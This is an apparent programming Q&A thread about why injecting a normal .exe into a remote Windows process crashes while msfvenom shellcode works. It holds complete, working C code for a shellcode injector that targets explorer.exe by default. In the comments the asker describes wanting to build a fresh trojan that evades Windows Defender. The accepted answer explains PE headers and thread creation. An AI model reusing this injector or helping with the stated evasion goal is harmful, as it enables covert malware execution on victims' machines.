# Why injecting normal exe into any remote process causes it to crash

Tags: c, winapi, shellcode, process-injection

While recently learning about the concept of process injection using C, I noticed that:

- if I try to read an `msfvenom`-generated shellcode file and inject it to any process, my program works perfectly and I get the desired result.
- if I try to read any normal `.exe` file and try to inject it into the same process - the process crashes every time.

The most peculiar thing is that my injector program returns successfully. The bytes are copied into the target process without any problem (I confirmed it by using Process Hacker). But, when the remote thread is created, the target process always crashes.

Anyway the `CreateRemoteThreadEx()` call returns a valid `ThreadID` every time. Why is that?

Note: I am injecting 64-bit code into a 64-bit process using my 64-bit injector compiled using Microsoft C/C++ compiler for 64-bit. So no issues regarding that.

Here is my entire code:

```
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <fileapi.h>

#define okay(msg, ...) printf("[+] " msg " \n", ##__VA_ARGS__)
#define fail(msg, ...) printf("[-] " msg " \n", ##__VA_ARGS__)
#define info(msg, ...) printf("[!] " msg " \n", ##__VA_ARGS__)

#define MAX_SHELLCODE_SIZE 4096

DWORD GetShellCode(LPVOID out) {
    HANDLE hFile = INVALID_HANDLE_VALUE;
    
    hFile = CreateFileA(".\\payload.bin", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        info("Unable to open payload file");
        return 0;
    }
    
    DWORD fileSize = GetFileSize(hFile, NULL);
    if (fileSize == INVALID_FILE_SIZE) {
        info("Unable to get payload file size");
        CloseHandle(hFile);
        return 0;
    }
    
    DWORD bytesRead;
    BOOL bSuccess = ReadFile(hFile, out, fileSize, (LPDWORD)&bytesRead, NULL);
    if (!bSuccess) {
        info("Unable to read payload file");
        CloseHandle(hFile);
        return 0;
    }
    
    CloseHandle(hFile);
    return bytesRead;
}

DWORD GetTargetID(const char* pName) {
    HANDLE hSnapshot;
    PROCESSENTRY32 pEntry;
    DWORD pID = 0;
    
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    
    pEntry.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hSnapshot, &pEntry) == FALSE) {
        CloseHandle(hSnapshot);
        return 0;
    }
    
    do {
        if (strcmp(pName, pEntry.szExeFile) == 0) {
            pID = pEntry.th32ProcessID;
            break;
        }
    } while (Process32Next(hSnapshot, &pEntry));
    
    CloseHandle(hSnapshot);
    return pID;
}

int main(int argc, char *argv[]) {
    DWORD pID = 0, tID = 0;
    HANDLE pHandle;
    HANDLE tHandle;
    LPVOID xBuffer;
    
    if (argc < 2) {
        pID = GetTargetID("explorer.exe");
    } else {
        pID = GetTargetID(argv[1]);
        if (pID == 0) {
            info("Injector was unable to find the process you specified.");
            return EXIT_FAILURE;
        }
    }
    
    UCHAR shellcode[MAX_SHELLCODE_SIZE] = {0};
    DWORD codeSize = GetShellCode(shellcode);
    if (codeSize == 0) {
        fail("Failed to get shellcode from payload file.");
        return EXIT_FAILURE;
    } else {
        okay("Payload Size found : %ld", codeSize);
    }
    
    info("Injection Started. Opening remote process by ID: %ld ...", pID);
    pHandle = OpenProcess((PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, pID);
    if (pHandle == NULL) {
        fail("Unable to open remote process. Error: (%ld)", GetLastError());
    } else {
        okay("Successfully opend the remote process with provided access.");
        info("Allocating %ld bytes of memory space to the target process.", codeSize); 
        xBuffer = VirtualAllocEx(pHandle, NULL, codeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        if (xBuffer == NULL) {
            fail("Unable to allocate virtual memory in the target process. Error: (%ld)", GetLastError());
        } else {
            okay("Successfully allocated %ld bytes virtual memory space in the target process.", codeSize);
            int len = 0;
            info("Attempting to write shellcode into the allocated space (Address : 0x%p)", xBuffer);
            BOOL wrtSuccess = WriteProcessMemory(pHandle, xBuffer, (LPCVOID)shellcode, (SIZE_T)codeSize, (SIZE_T*)&len);
            if (!wrtSuccess) {
                fail("Unable to write shellcode to the allocated memory of the target process. Error: (%ld)", GetLastError());
            } else {
                okay("Successfully copied %d bytes into the the target process.", len);
                DWORD oldProtection;
                BOOL bSuccess = VirtualProtectEx(pHandle, xBuffer, (SIZE_T)codeSize, PAGE_EXECUTE, &oldProtection);
                if (!bSuccess) {
                    fail("Unable to change memory page protection status. Error: (%ld)", GetLastError());
                } else {
                    info("Attempting to start remote thread with the copied shellcode");
                    tHandle = CreateRemoteThreadEx(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)xBuffer, NULL, 0, 0, &tID);
                    if (tHandle == NULL) {
                        fail("Unable to create thread with the copied shellcode in the target process. Error: (%ud)", GetLastError());
                    } else {
                        okay("Injection Successfull. Executed remote shellcode (ThreadID: %ld) in the target process.", tID);
                        CloseHandle(tHandle);
                    }
                }
            }
        }
        CloseHandle(pHandle);
    }
    return EXIT_SUCCESS;
}
```

Comment: I'm no expert, but injecting an entire PE executable into another process space seems doomed to fail. It is not quite that simple, there is a lot of preprocessing (such as relocations) done by the windows EXE loader prior to the process memory being filled with the data in question. Maybe this can help you? https://github.com/aaaddress1/RunPE-In-Memory/tree/master

Comment: Of course remote thread must crash. Exe not a shell code

Comment: Do you not have any interest in learning what `MSFvenom` does?

Comment: Yes off course.  What I really want to know that how can I make MSFvenom like shellcode from any exe? I noticed that msfvenom generates really small and compact shellcodes. I found many python scripts that claims to to that for any exe but the resulting shellcodes are ridiculously huge and not usable and crashes the process anyway.

Comment: What I'm curious about is what the practical use for this would be

Comment: Nothing what so ever. This is just somthing thats bugging me for a while. But I am unable to test it. See any shellcode that is generated by msfvenom is heavily signatured by now and easily detectectable by Windows Defender. BUT what if I make a fresh trojan using C and use that shellcode to inject? Will windows defender detect it? I can only test that If I can extract shellcode form the compiled exe. Right? Or something I am missing here?

Answer (score 2, accepted):

> if I try to read an `msfvenom`-generated shellcode file and inject it to any process, my program works perfectly and I get the desired result.

ShellCode contains just machine code and nothing else, that's why you can run ShellCode as-is in a thread.

> if I try to read any normal `.exe` file and try to inject it into the same process - the process crashes every time.

That is because an `.exe` file contains a lot more than just machine code.

A thread runs machine code starting at the address you tell it.  If you simply inject the `.exe` data as-is and then start a thread at the beginning of that data, then of course the thread will crash, because the `.exe` data does not *begin* with machine code. It begins with a series of metadata headers and lookup tables.  The OS's EXE loader reads those headers and tables, sets up an appropriate environment for the `.exe`'s code to run in, locates the actual machine code in the `.exe`, and then starts a thread to run it.

> The most peculiar thing is that my injector program returns successfully. The bytes are copied into the target process without any problem (I confirmed it by using Process Hacker). But, when the remote thread is created, the target process always crashes.
>
> Anyway the `CreateRemoteThreadEx()` call returns a valid `ThreadID` every time. Why is that?

Any API that creates a thread has no concept of the machine code it is told to run. The API merely sets up the thread object and schedules it to run on a CPU, and then tells you whether it was successful or not. The failure you are encountering does not occur until the thread actually begins running and then tries to execute machine code from bytes that were not meant to be interpreted as machine code.

Comment: OMG that's a lot! Thank you for explaining so clearly. And now I know why the shellcode extracted from the simple calc.exe was so huge :). I found some python script that reads any exe and converts them to "\x" style hex code. Every time it  creates humongous mess of a hex code.

Comment: On that note is it even possible to extract just the machine code from any windows exe file? Say a Hello World program written in C. Now I want to inject it. Can I extract the machine code of the compiled program without the metadata header and lookup tables as you mentioned above.

Comment: One can extract the object code from *any* executable image. That's not sufficient to turn it into self-contained executable code since it will most likely want to access static data, call into imports, and won't be position-independent.

Comment: Ok but then can you explain how the meterpreter payload is built? Because that kind of sophisticated malware can't be made of pure assembly language. How they generate such small shellcode which are basically sophisticated piece of software (or malware).